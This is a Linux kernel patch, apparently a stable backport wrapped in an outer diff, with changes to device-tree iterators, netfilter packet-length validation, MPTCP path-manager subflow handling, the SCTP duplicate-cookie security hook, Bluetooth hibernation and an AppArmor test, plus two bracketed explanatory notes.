+index 1c5301e10442f..2960e609ca05e 100644
+--- a/include/linux/of.h
++++ b/include/linux/of.h
+@@ -13,6 +13,7 @@
+  */
+ #include <linux/types.h>
+ #include <linux/bitops.h>
++#include <linux/cleanup.h>
+ #include <linux/errno.h>
+ #include <linux/kobject.h>
+ #include <linux/mod_devicetable.h>
+@@ -128,6 +129,7 @@ static inline struct device_node *of_node_get(struct device_node *node)
+ }
+ static inline void of_node_put(struct device_node *node) { }
+ #endif /* !CONFIG_OF_DYNAMIC */
++DEFINE_FREE(device_node, struct device_node *, if (_T) of_node_put(_T))
+ 
+ /* Pointer for first entry in chain of all nodes. */
+ extern struct device_node *of_root;
+@@ -1371,10 +1373,23 @@ static inline int of_property_read_s32(const struct device_node *np,
+ #define for_each_child_of_node(parent, child) \
+ 	for (child = of_get_next_child(parent, NULL); child != NULL; \
+ 	     child = of_get_next_child(parent, child))
++
++#define for_each_child_of_node_scoped(parent, child) \
++	for (struct device_node *child __free(device_node) =		\
++	     of_get_next_child(parent, NULL);				\
++	     child != NULL;						\
++	     child = of_get_next_child(parent, child))
++
+ #define for_each_available_child_of_node(parent, child) \
+ 	for (child = of_get_next_available_child(parent, NULL); child != NULL; \
+ 	     child = of_get_next_available_child(parent, child))
+ 
++#define for_each_available_child_of_node_scoped(parent, child) \
++	for (struct device_node *child __free(device_node) =		\
++	     of_get_next_available_child(parent, NULL);			\
++	     child != NULL;						\
++	     child = of_get_next_available_child(parent, child))
++
+ #define for_each_of_cpu_node(cpu) \
+ 	for (cpu = of_get_next_cpu_node(NULL); cpu != NULL; \
+ 	     cpu = of_get_next_cpu_node(cpu))
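
[The new *_scoped iterators lean on the DEFINE_FREE(device_node, ...) hook added earlier in this header: the loop variable is declared with __free(device_node), so its reference is dropped automatically when it leaves scope. A hedged usage sketch ("some,flag" is an invented property name; of_property_read_bool() is the real OF API):

    static int count_flagged_children(struct device_node *parent)
    {
        int n = 0;

        for_each_available_child_of_node_scoped(parent, child) {
            if (of_property_read_bool(child, "some,flag"))
                n++;
            if (n > 8)
                return -EINVAL;   /* early return: no of_node_put() needed */
        }
        return n;
    }
]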
+diff --git a/include/net/busy_poll.h b/include/net/busy_poll.h
+index f90f0021f5f2d..5387e1daa5a8b 100644
+--- a/include/net/busy_poll.h
++++ b/include/net/busy_poll.h
+@@ -63,7 +63,7 @@ static inline bool sk_can_busy_loop(struct sock *sk)
+ static inline unsigned long busy_loop_current_time(void)
+ {
+ #ifdef CONFIG_NET_RX_BUSY_POLL
+-	return (unsigned long)(local_clock() >> 10);
++	return (unsigned long)(ktime_get_ns() >> 10);
+ #else
+ 	return 0;
+ #endif
+diff --git a/include/net/netfilter/nf_tables_ipv4.h b/include/net/netfilter/nf_tables_ipv4.h
+index 5225d2bd1a6e9..10b0a7c9e721f 100644
+--- a/include/net/netfilter/nf_tables_ipv4.h
++++ b/include/net/netfilter/nf_tables_ipv4.h
+@@ -19,7 +19,7 @@ static inline void nft_set_pktinfo_ipv4(struct nft_pktinfo *pkt)
+ static inline int __nft_set_pktinfo_ipv4_validate(struct nft_pktinfo *pkt)
+ {
+ 	struct iphdr *iph, _iph;
+-	u32 len, thoff;
++	u32 len, thoff, skb_len;
+ 
+ 	iph = skb_header_pointer(pkt->skb, skb_network_offset(pkt->skb),
+ 				 sizeof(*iph), &_iph);
+@@ -30,15 +30,17 @@ static inline int __nft_set_pktinfo_ipv4_validate(struct nft_pktinfo *pkt)
+ 		return -1;
+ 
+ 	len = iph_totlen(pkt->skb, iph);
+-	thoff = skb_network_offset(pkt->skb) + (iph->ihl * 4);
+-	if (pkt->skb->len < len)
++	thoff = iph->ihl * 4;
++	skb_len = pkt->skb->len - skb_network_offset(pkt->skb);
++
++	if (skb_len < len)
+ 		return -1;
+ 	else if (len < thoff)
+ 		return -1;
+ 
+ 	pkt->flags = NFT_PKTINFO_L4PROTO;
+ 	pkt->tprot = iph->protocol;
+-	pkt->thoff = thoff;
++	pkt->thoff = skb_network_offset(pkt->skb) + thoff;
+ 	pkt->fragoff = ntohs(iph->frag_off) & IP_OFFSET;
+ 
+ 	return 0;
+diff --git a/include/net/netfilter/nf_tables_ipv6.h b/include/net/netfilter/nf_tables_ipv6.h
+index ec7eaeaf4f04c..f1d6a65280475 100644
+--- a/include/net/netfilter/nf_tables_ipv6.h
++++ b/include/net/netfilter/nf_tables_ipv6.h
+@@ -31,8 +31,8 @@ static inline int __nft_set_pktinfo_ipv6_validate(struct nft_pktinfo *pkt)
+ 	struct ipv6hdr *ip6h, _ip6h;
+ 	unsigned int thoff = 0;
+ 	unsigned short frag_off;
++	u32 pkt_len, skb_len;
+ 	int protohdr;
+-	u32 pkt_len;
+ 
+ 	ip6h = skb_header_pointer(pkt->skb, skb_network_offset(pkt->skb),
+ 				  sizeof(*ip6h), &_ip6h);
+@@ -43,7 +43,8 @@ static inline int __nft_set_pktinfo_ipv6_validate(struct nft_pktinfo *pkt)
+ 		return -1;
+ 
+ 	pkt_len = ntohs(ip6h->payload_len);
+-	if (pkt_len + sizeof(*ip6h) > pkt->skb->len)
++	skb_len = pkt->skb->len - skb_network_offset(pkt->skb);
++	if (pkt_len + sizeof(*ip6h) > skb_len)
+ 		return -1;
+ 
+ 	protohdr = ipv6_find_hdr(pkt->skb, &thoff, -1, &frag_off, &flags);
+diff --git a/mm/truncate.c b/mm/truncate.c
+index 0d4dd233f5187..96e9812667db2 100644
+--- a/mm/truncate.c
++++ b/mm/truncate.c
+@@ -174,7 +174,7 @@ static void truncate_cleanup_folio(struct folio *folio)
+ 	if (folio_mapped(folio))
+ 		unmap_mapping_folio(folio);
+ 
+-	if (folio_has_private(folio))
++	if (folio_needs_release(folio))
+ 		folio_invalidate(folio, 0, folio_size(folio));
+ 
+ 	/*
+@@ -235,7 +235,7 @@ bool truncate_inode_partial_folio(struct folio *folio, loff_t start, loff_t end)
+ 	 */
+ 	folio_zero_range(folio, offset, length);
+ 
+-	if (folio_has_private(folio))
++	if (folio_needs_release(folio))
+ 		folio_invalidate(folio, offset, length);
+ 	if (!folio_test_large(folio))
+ 		return true;
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 210e03a3609d4..dc19a0b1a2f6d 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2405,10 +2405,16 @@ static int hci_suspend_notifier(struct notifier_block *nb, unsigned long action,
+ 	/* To avoid a potential race with hci_unregister_dev. */
+ 	hci_dev_hold(hdev);
+ 
+-	if (action == PM_SUSPEND_PREPARE)
++	switch (action) {
++	case PM_HIBERNATION_PREPARE:
++	case PM_SUSPEND_PREPARE:
+ 		ret = hci_suspend_dev(hdev);
+-	else if (action == PM_POST_SUSPEND)
++		break;
++	case PM_POST_HIBERNATION:
++	case PM_POST_SUSPEND:
+ 		ret = hci_resume_dev(hdev);
++		break;
++	}
+ 
+ 	if (ret)
+ 		bt_dev_err(hdev, "Suspend notifier action (%lu) failed: %d",
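
[The switch above extends the Bluetooth suspend notifier to the hibernation actions, which previously fell through and did nothing. register_pm_notifier() and the PM_* action values are the stock kernel API; the handler body below is an illustrative sketch, not hci code:

    #include <linux/suspend.h>

    static int my_pm_notifier(struct notifier_block *nb,
                              unsigned long action, void *data)
    {
        switch (action) {
        case PM_HIBERNATION_PREPARE:
        case PM_SUSPEND_PREPARE:
            /* quiesce the device before the image is written / RAM suspends */
            break;
        case PM_POST_HIBERNATION:
        case PM_POST_SUSPEND:
            /* resume normal operation */
            break;
        }
        return NOTIFY_DONE;
    }

    static struct notifier_block my_pm_nb = { .notifier_call = my_pm_notifier };
    /* register_pm_notifier(&my_pm_nb) at init, unregister_pm_notifier() at exit */
]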
+diff --git a/net/core/net-sysfs.c b/net/core/net-sysfs.c
+index fdf3308b03350..8a06f97320e04 100644
+--- a/net/core/net-sysfs.c
++++ b/net/core/net-sysfs.c
+@@ -215,7 +215,7 @@ static ssize_t speed_show(struct device *dev,
+ 	if (!rtnl_trylock())
+ 		return restart_syscall();
+ 
+-	if (netif_running(netdev) && netif_device_present(netdev)) {
++	if (netif_running(netdev)) {
+ 		struct ethtool_link_ksettings cmd;
+ 
+ 		if (!__ethtool_get_link_ksettings(netdev, &cmd))
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index e31d1247b9f08..442c4c343e155 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -445,6 +445,9 @@ int __ethtool_get_link_ksettings(struct net_device *dev,
+ 	if (!dev->ethtool_ops->get_link_ksettings)
+ 		return -EOPNOTSUPP;
+ 
++	if (!netif_device_present(dev))
++		return -ENODEV;
++
+ 	memset(link_ksettings, 0, sizeof(*link_ksettings));
+ 	return dev->ethtool_ops->get_link_ksettings(dev, link_ksettings);
+ }
+diff --git a/net/mptcp/pm.c b/net/mptcp/pm.c
+index a27ee627addef..5646c7275a92d 100644
+--- a/net/mptcp/pm.c
++++ b/net/mptcp/pm.c
+@@ -59,16 +59,6 @@ int mptcp_pm_remove_addr(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_
+ 	return 0;
+ }
+ 
+-int mptcp_pm_remove_subflow(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list)
+-{
+-	pr_debug("msk=%p, rm_list_nr=%d", msk, rm_list->nr);
+-
+-	spin_lock_bh(&msk->pm.lock);
+-	mptcp_pm_nl_rm_subflow_received(msk, rm_list);
+-	spin_unlock_bh(&msk->pm.lock);
+-	return 0;
+-}
+-
+ /* path manager event handlers */
+ 
+ void mptcp_pm_new_connection(struct mptcp_sock *msk, const struct sock *ssk, int server_side)
+@@ -235,7 +225,9 @@ void mptcp_pm_add_addr_received(const struct sock *ssk,
+ 		} else {
+ 			__MPTCP_INC_STATS(sock_net((struct sock *)msk), MPTCP_MIB_ADDADDRDROP);
+ 		}
+-	} else if (!READ_ONCE(pm->accept_addr)) {
++	/* id0 should not have a different address */
++	} else if ((addr->id == 0 && !mptcp_pm_nl_is_init_remote_addr(msk, addr)) ||
++		   (addr->id > 0 && !READ_ONCE(pm->accept_addr))) {
+ 		mptcp_pm_announce_addr(msk, addr, true);
+ 		mptcp_pm_add_addr_send_ack(msk);
+ 	} else if (mptcp_pm_schedule_work(msk, MPTCP_PM_ADD_ADDR_RECEIVED)) {
+@@ -413,7 +405,23 @@ bool mptcp_pm_rm_addr_signal(struct mptcp_sock *msk, unsigned int remaining,
+ 
+ int mptcp_pm_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ {
+-	return mptcp_pm_nl_get_local_id(msk, skc);
++	struct mptcp_addr_info skc_local;
++	struct mptcp_addr_info msk_local;
++
++	if (WARN_ON_ONCE(!msk))
++		return -1;
++
++	/* The 0 ID mapping is defined by the first subflow, copied into the msk
++	 * addr
++	 */
++	mptcp_local_address((struct sock_common *)msk, &msk_local);
++	mptcp_local_address((struct sock_common *)skc, &skc_local);
++	if (mptcp_addresses_equal(&msk_local, &skc_local, false))
++		return 0;
++
++	if (mptcp_pm_is_userspace(msk))
++		return mptcp_userspace_pm_get_local_id(msk, &skc_local);
++	return mptcp_pm_nl_get_local_id(msk, &skc_local);
+ }
+ 
+ bool mptcp_pm_is_backup(struct mptcp_sock *msk, struct sock_common *skc)
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 2bce3a32bd881..9e16ae1b23fc7 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -134,12 +134,15 @@ static bool lookup_subflow_by_daddr(const struct list_head *list,
+ {
+ 	struct mptcp_subflow_context *subflow;
+ 	struct mptcp_addr_info cur;
+-	struct sock_common *skc;
+ 
+ 	list_for_each_entry(subflow, list, node) {
+-		skc = (struct sock_common *)mptcp_subflow_tcp_sock(subflow);
++		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
++
++		if (!((1 << inet_sk_state_load(ssk)) &
++		      (TCPF_ESTABLISHED | TCPF_SYN_SENT | TCPF_SYN_RECV)))
++			continue;
+ 
+-		remote_address(skc, &cur);
++		remote_address((struct sock_common *)ssk, &cur);
+ 		if (mptcp_addresses_equal(&cur, daddr, daddr->port))
+ 			return true;
+ 	}
+@@ -736,6 +739,15 @@ static void mptcp_pm_nl_add_addr_received(struct mptcp_sock *msk)
+ 	}
+ }
+ 
++bool mptcp_pm_nl_is_init_remote_addr(struct mptcp_sock *msk,
++				     const struct mptcp_addr_info *remote)
++{
++	struct mptcp_addr_info mpc_remote;
++
++	remote_address((struct sock_common *)msk, &mpc_remote);
++	return mptcp_addresses_equal(&mpc_remote, remote, remote->port);
++}
++
+ void mptcp_pm_nl_addr_send_ack(struct mptcp_sock *msk)
+ {
+ 	struct mptcp_subflow_context *subflow;
+@@ -747,9 +759,12 @@ void mptcp_pm_nl_addr_send_ack(struct mptcp_sock *msk)
+ 	    !mptcp_pm_should_rm_signal(msk))
+ 		return;
+ 
+-	subflow = list_first_entry_or_null(&msk->conn_list, typeof(*subflow), node);
+-	if (subflow)
+-		mptcp_pm_send_ack(msk, subflow, false, false);
++	mptcp_for_each_subflow(msk, subflow) {
++		if (__mptcp_subflow_active(subflow)) {
++			mptcp_pm_send_ack(msk, subflow, false, false);
++			break;
++		}
++	}
+ }
+ 
+ int mptcp_pm_nl_mp_prio_send_ack(struct mptcp_sock *msk,
+@@ -819,6 +834,8 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 			int how = RCV_SHUTDOWN | SEND_SHUTDOWN;
+ 			u8 id = subflow_get_local_id(subflow);
+ 
++			if (inet_sk_state_load(ssk) == TCP_CLOSE)
++				continue;
+ 			if (rm_type == MPTCP_MIB_RMADDR && remote_id != rm_id)
+ 				continue;
+ 			if (rm_type == MPTCP_MIB_RMSUBFLOW && !mptcp_local_id_match(msk, id, rm_id))
+@@ -838,10 +855,10 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 			if (rm_type == MPTCP_MIB_RMSUBFLOW)
+ 				__MPTCP_INC_STATS(sock_net(sk), rm_type);
+ 		}
+-		if (rm_type == MPTCP_MIB_RMSUBFLOW)
+-			__set_bit(rm_id ? rm_id : msk->mpc_endpoint_id, msk->pm.id_avail_bitmap);
+-		else if (rm_type == MPTCP_MIB_RMADDR)
++
++		if (rm_type == MPTCP_MIB_RMADDR)
+ 			__MPTCP_INC_STATS(sock_net(sk), rm_type);
++
+ 		if (!removed)
+ 			continue;
+ 
+@@ -853,10 +870,8 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 			/* Note: if the subflow has been closed before, this
+ 			 * add_addr_accepted counter will not be decremented.
+ 			 */
+-			msk->pm.add_addr_accepted--;
+-			WRITE_ONCE(msk->pm.accept_addr, true);
+-		} else if (rm_type == MPTCP_MIB_RMSUBFLOW) {
+-			msk->pm.local_addr_used--;
++			if (--msk->pm.add_addr_accepted < mptcp_pm_get_add_addr_accept_max(msk))
++				WRITE_ONCE(msk->pm.accept_addr, true);
+ 		}
+ 	}
+ }
+@@ -866,8 +881,8 @@ static void mptcp_pm_nl_rm_addr_received(struct mptcp_sock *msk)
+ 	mptcp_pm_nl_rm_addr_or_subflow(msk, &msk->pm.rm_list_rx, MPTCP_MIB_RMADDR);
+ }
+ 
+-void mptcp_pm_nl_rm_subflow_received(struct mptcp_sock *msk,
+-				     const struct mptcp_rm_list *rm_list)
++static void mptcp_pm_nl_rm_subflow_received(struct mptcp_sock *msk,
++					    const struct mptcp_rm_list *rm_list)
+ {
+ 	mptcp_pm_nl_rm_addr_or_subflow(msk, rm_list, MPTCP_MIB_RMSUBFLOW);
+ }
+@@ -1074,33 +1089,17 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 	return 0;
+ }
+ 
+-int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
++int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct mptcp_addr_info *skc)
+ {
+ 	struct mptcp_pm_addr_entry *entry;
+-	struct mptcp_addr_info skc_local;
+-	struct mptcp_addr_info msk_local;
+ 	struct pm_nl_pernet *pernet;
+ 	int ret = -1;
+ 
+-	if (WARN_ON_ONCE(!msk))
+-		return -1;
+-
+-	/* The 0 ID mapping is defined by the first subflow, copied into the msk
+-	 * addr
+-	 */
+-	mptcp_local_address((struct sock_common *)msk, &msk_local);
+-	mptcp_local_address((struct sock_common *)skc, &skc_local);
+-	if (mptcp_addresses_equal(&msk_local, &skc_local, false))
+-		return 0;
+-
+-	if (mptcp_pm_is_userspace(msk))
+-		return mptcp_userspace_pm_get_local_id(msk, &skc_local);
+-
+ 	pernet = pm_nl_get_pernet_from_msk(msk);
+ 
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(entry, &pernet->local_addr_list, list) {
+-		if (mptcp_addresses_equal(&entry->addr, &skc_local, entry->addr.port)) {
++		if (mptcp_addresses_equal(&entry->addr, skc, entry->addr.port)) {
+ 			ret = entry->addr.id;
+ 			break;
+ 		}
+@@ -1114,7 +1113,7 @@ int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ 	if (!entry)
+ 		return -ENOMEM;
+ 
+-	entry->addr = skc_local;
++	entry->addr = *skc;
+ 	entry->addr.id = 0;
+ 	entry->addr.port = 0;
+ 	entry->ifindex = 0;
+@@ -1328,20 +1327,27 @@ static struct pm_nl_pernet *genl_info_pm_nl(struct genl_info *info)
+ 	return pm_nl_get_pernet(genl_info_net(info));
+ }
+ 
+-static int mptcp_nl_add_subflow_or_signal_addr(struct net *net)
++static int mptcp_nl_add_subflow_or_signal_addr(struct net *net,
++					       struct mptcp_addr_info *addr)
+ {
+ 	struct mptcp_sock *msk;
+ 	long s_slot = 0, s_num = 0;
+ 
+ 	while ((msk = mptcp_token_iter_next(net, &s_slot, &s_num)) != NULL) {
+ 		struct sock *sk = (struct sock *)msk;
++		struct mptcp_addr_info mpc_addr;
+ 
+ 		if (!READ_ONCE(msk->fully_established) ||
+ 		    mptcp_pm_is_userspace(msk))
+ 			goto next;
+ 
++		/* if the endp linked to the init sf is re-added with a != ID */
++		mptcp_local_address((struct sock_common *)msk, &mpc_addr);
++
+ 		lock_sock(sk);
+ 		spin_lock_bh(&msk->pm.lock);
++		if (mptcp_addresses_equal(addr, &mpc_addr, addr->port))
++			msk->mpc_endpoint_id = addr->id;
+ 		mptcp_pm_create_subflow_or_signal_addr(msk);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 		release_sock(sk);
+@@ -1414,7 +1420,7 @@ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ 		goto out_free;
+ 	}
+ 
+-	mptcp_nl_add_subflow_or_signal_addr(sock_net(skb->sk));
++	mptcp_nl_add_subflow_or_signal_addr(sock_net(skb->sk), &entry->addr);
+ 	return 0;
+ 
+ out_free:
+@@ -1488,6 +1494,14 @@ static bool mptcp_pm_remove_anno_addr(struct mptcp_sock *msk,
+ 	return ret;
+ }
+ 
++static void __mark_subflow_endp_available(struct mptcp_sock *msk, u8 id)
++{
++	/* If it was marked as used, and not ID 0, decrement local_addr_used */
++	if (!__test_and_set_bit(id ? : msk->mpc_endpoint_id, msk->pm.id_avail_bitmap) &&
++	    id && !WARN_ON_ONCE(msk->pm.local_addr_used == 0))
++		msk->pm.local_addr_used--;
++}
++
+ static int mptcp_nl_remove_subflow_and_signal_addr(struct net *net,
+ 						   const struct mptcp_pm_addr_entry *entry)
+ {
+@@ -1518,15 +1532,19 @@ static int mptcp_nl_remove_subflow_and_signal_addr(struct net *net,
+ 					  !(entry->flags & MPTCP_PM_ADDR_FLAG_IMPLICIT));
+ 
+ 		if (remove_subflow) {
+-			mptcp_pm_remove_subflow(msk, &list);
+-		} else if (entry->flags & MPTCP_PM_ADDR_FLAG_SUBFLOW) {
+-			/* If the subflow has been used, but now closed */
+ 			spin_lock_bh(&msk->pm.lock);
+-			if (!__test_and_set_bit(entry->addr.id, msk->pm.id_avail_bitmap))
+-				msk->pm.local_addr_used--;
++			mptcp_pm_nl_rm_subflow_received(msk, &list);
++			spin_unlock_bh(&msk->pm.lock);
++		}
++
++		if (entry->flags & MPTCP_PM_ADDR_FLAG_SUBFLOW) {
++			spin_lock_bh(&msk->pm.lock);
++			__mark_subflow_endp_available(msk, list.ids[0]);
+ 			spin_unlock_bh(&msk->pm.lock);
+ 		}
+ 
++		if (msk->mpc_endpoint_id == entry->addr.id)
++			msk->mpc_endpoint_id = 0;
+ 		release_sock(sk);
+ 
+ next:
+@@ -1561,6 +1579,7 @@ static int mptcp_nl_remove_id_zero_address(struct net *net,
+ 		spin_lock_bh(&msk->pm.lock);
+ 		mptcp_pm_remove_addr(msk, &list);
+ 		mptcp_pm_nl_rm_subflow_received(msk, &list);
++		__mark_subflow_endp_available(msk, 0);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 		release_sock(sk);
+ 
+@@ -1664,18 +1683,14 @@ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 			alist.ids[alist.nr++] = entry->addr.id;
+ 	}
+ 
++	spin_lock_bh(&msk->pm.lock);
+ 	if (alist.nr) {
+-		spin_lock_bh(&msk->pm.lock);
+ 		msk->pm.add_addr_signaled -= alist.nr;
+ 		mptcp_pm_remove_addr(msk, &alist);
+-		spin_unlock_bh(&msk->pm.lock);
+ 	}
+-
+ 	if (slist.nr)
+-		mptcp_pm_remove_subflow(msk, &slist);
+-
++		mptcp_pm_nl_rm_subflow_received(msk, &slist);
+ 	/* Reset counters: maybe some subflows have been removed before */
+-	spin_lock_bh(&msk->pm.lock);
+ 	bitmap_fill(msk->pm.id_avail_bitmap, MPTCP_PM_MAX_ADDR_ID + 1);
+ 	msk->pm.local_addr_used = 0;
+ 	spin_unlock_bh(&msk->pm.lock);
+@@ -1957,6 +1972,7 @@ static void mptcp_pm_nl_fullmesh(struct mptcp_sock *msk,
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 	mptcp_pm_nl_rm_subflow_received(msk, &list);
++	__mark_subflow_endp_available(msk, list.ids[0]);
+ 	mptcp_pm_create_subflow_or_signal_addr(msk);
+ 	spin_unlock_bh(&msk->pm.lock);
+ }
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 75ae91c931294..258dbfe9fad30 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2309,7 +2309,7 @@ static struct sock *mptcp_subflow_get_retrans(struct mptcp_sock *msk)
+ 			continue;
+ 		}
+ 
+-		if (subflow->backup) {
++		if (subflow->backup || subflow->request_bkup) {
+ 			if (!backup)
+ 				backup = ssk;
+ 			continue;
+@@ -2528,8 +2528,11 @@ static void __mptcp_close_subflow(struct sock *sk)
+ 
+ 	mptcp_for_each_subflow_safe(msk, subflow, tmp) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
++		int ssk_state = inet_sk_state_load(ssk);
+ 
+-		if (inet_sk_state_load(ssk) != TCP_CLOSE)
++		if (ssk_state != TCP_CLOSE &&
++		    (ssk_state != TCP_CLOSE_WAIT ||
++		     inet_sk_state_load(sk) != TCP_ESTABLISHED))
+ 			continue;
+ 
+ 		/* 'subflow_data_ready' will re-sched once rx queue is empty */
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 4515cc6b649fc..c3cd68edab779 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -802,6 +802,8 @@ void mptcp_pm_add_addr_received(const struct sock *ssk,
+ void mptcp_pm_add_addr_echoed(struct mptcp_sock *msk,
+ 			      const struct mptcp_addr_info *addr);
+ void mptcp_pm_add_addr_send_ack(struct mptcp_sock *msk);
++bool mptcp_pm_nl_is_init_remote_addr(struct mptcp_sock *msk,
++				     const struct mptcp_addr_info *remote);
+ void mptcp_pm_nl_addr_send_ack(struct mptcp_sock *msk);
+ void mptcp_pm_rm_addr_received(struct mptcp_sock *msk,
+ 			       const struct mptcp_rm_list *rm_list);
+@@ -834,7 +836,6 @@ int mptcp_pm_announce_addr(struct mptcp_sock *msk,
+ 			   const struct mptcp_addr_info *addr,
+ 			   bool echo);
+ int mptcp_pm_remove_addr(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list);
+-int mptcp_pm_remove_subflow(struct mptcp_sock *msk, const struct mptcp_rm_list *rm_list);
+ void mptcp_pm_remove_addrs(struct mptcp_sock *msk, struct list_head *rm_list);
+ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 					struct list_head *rm_list);
+@@ -912,6 +913,7 @@ bool mptcp_pm_add_addr_signal(struct mptcp_sock *msk, const struct sk_buff *skb,
+ bool mptcp_pm_rm_addr_signal(struct mptcp_sock *msk, unsigned int remaining,
+ 			     struct mptcp_rm_list *rm_list);
+ int mptcp_pm_get_local_id(struct mptcp_sock *msk, struct sock_common *skc);
++int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
+ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
+ bool mptcp_pm_is_backup(struct mptcp_sock *msk, struct sock_common *skc);
+ bool mptcp_pm_nl_is_backup(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
+@@ -928,9 +930,6 @@ static inline u8 subflow_get_local_id(const struct mptcp_subflow_context *subflo
+ 
+ void __init mptcp_pm_nl_init(void);
+ void mptcp_pm_nl_work(struct mptcp_sock *msk);
+-void mptcp_pm_nl_rm_subflow_received(struct mptcp_sock *msk,
+-				     const struct mptcp_rm_list *rm_list);
+-int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc);
+ unsigned int mptcp_pm_get_add_addr_signal_max(const struct mptcp_sock *msk);
+ unsigned int mptcp_pm_get_add_addr_accept_max(const struct mptcp_sock *msk);
+ unsigned int mptcp_pm_get_subflows_max(const struct mptcp_sock *msk);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index b47673b370279..1a92c8edd0a0e 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1137,12 +1137,16 @@ static void mptcp_subflow_discard_data(struct sock *ssk, struct sk_buff *skb,
+ /* sched mptcp worker to remove the subflow if no more data is pending */
+ static void subflow_sched_work_if_closed(struct mptcp_sock *msk, struct sock *ssk)
+ {
+-	if (likely(ssk->sk_state != TCP_CLOSE))
++	struct sock *sk = (struct sock *)msk;
++
++	if (likely(ssk->sk_state != TCP_CLOSE &&
++		   (ssk->sk_state != TCP_CLOSE_WAIT ||
++		    inet_sk_state_load(sk) != TCP_ESTABLISHED)))
+ 		return;
+ 
+ 	if (skb_queue_empty(&ssk->sk_receive_queue) &&
+ 	    !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
+-		mptcp_schedule_work((struct sock *)msk);
++		mptcp_schedule_work(sk);
+ }
+ 
+ static bool subflow_can_fallback(struct mptcp_subflow_context *subflow)
+diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c
+index 5383b6a9da61c..a56749a50e5c5 100644
+--- a/net/sctp/sm_statefuns.c
++++ b/net/sctp/sm_statefuns.c
+@@ -2261,12 +2261,6 @@ enum sctp_disposition sctp_sf_do_5_2_4_dupcook(
+ 		}
+ 	}
+ 
+-	/* Update socket peer label if first association. */
+-	if (security_sctp_assoc_request(new_asoc, chunk->head_skb ?: chunk->skb)) {
+-		sctp_association_free(new_asoc);
+-		return sctp_sf_pdiscard(net, ep, asoc, type, arg, commands);
+-	}
+-
+ 	/* Set temp so that it won't be added into hashtable */
+ 	new_asoc->temp = 1;
+ 
+@@ -2275,6 +2269,22 @@ enum sctp_disposition sctp_sf_do_5_2_4_dupcook(
+ 	 */
+ 	action = sctp_tietags_compare(new_asoc, asoc);
+ 
++	/* In cases C and E the association doesn't enter the ESTABLISHED
++	 * state, so there is no need to call security_sctp_assoc_request().
++	 */
++	switch (action) {
++	case 'A': /* Association restart. */
++	case 'B': /* Collision case B. */
++	case 'D': /* Collision case D. */
++		/* Update socket peer label if first association. */
++		if (security_sctp_assoc_request((struct sctp_association *)asoc,
++						chunk->head_skb ?: chunk->skb)) {
++			sctp_association_free(new_asoc);
++			return sctp_sf_pdiscard(net, ep, asoc, type, arg, commands);
++		}
++		break;
++	}
++
+ 	switch (action) {
+ 	case 'A': /* Association restart. */
+ 		retval = sctp_sf_do_dupcook_a(net, ep, asoc, chunk, commands,
+diff --git a/security/apparmor/policy_unpack_test.c b/security/apparmor/policy_unpack_test.c
+index f25cf2a023d57..0711a0305df34 100644
+--- a/security/apparmor/policy_unpack_test.c
++++ b/security/apparmor/policy_unpack_test.c
+@@ -81,14 +81,14 @@ static struct aa_ext *build_aa_ext_struct(struct policy_unpack_fixture *puf,
+ 	*(buf + 1) = strlen(TEST_U32_NAME) + 1;
+ 	strcpy(buf + 3, TEST_U32_NAME);
+ 	*(buf + 3 + strlen(TEST_U32_NAME) + 1) = AA_U32;
+-	*((u32 *)(buf + 3 + strlen(TEST_U32_NAME) + 2)) = TEST_U32_DATA;
++	*((__le32 *)(buf + 3 + strlen(TEST_U32_NAME) + 2)) = cpu_to_le32(TEST_U32_DATA);
+ 
+ 	buf = e->start + TEST_NAMED_U64_BUF_OFFSET;
+ 	*buf = AA_NAME;
+ 	*(buf + 1) = strlen(TEST_U64_NAME) + 1;
+ 	strcpy(buf + 3, TEST_U64_NAME);
+ 	*(buf + 3 + strlen(TEST_U64_NAME) + 1) = AA_U64;
+-	*((u64 *)(buf + 3 + strlen(TEST_U64_NAME) + 2)) = TEST_U64_DATA;
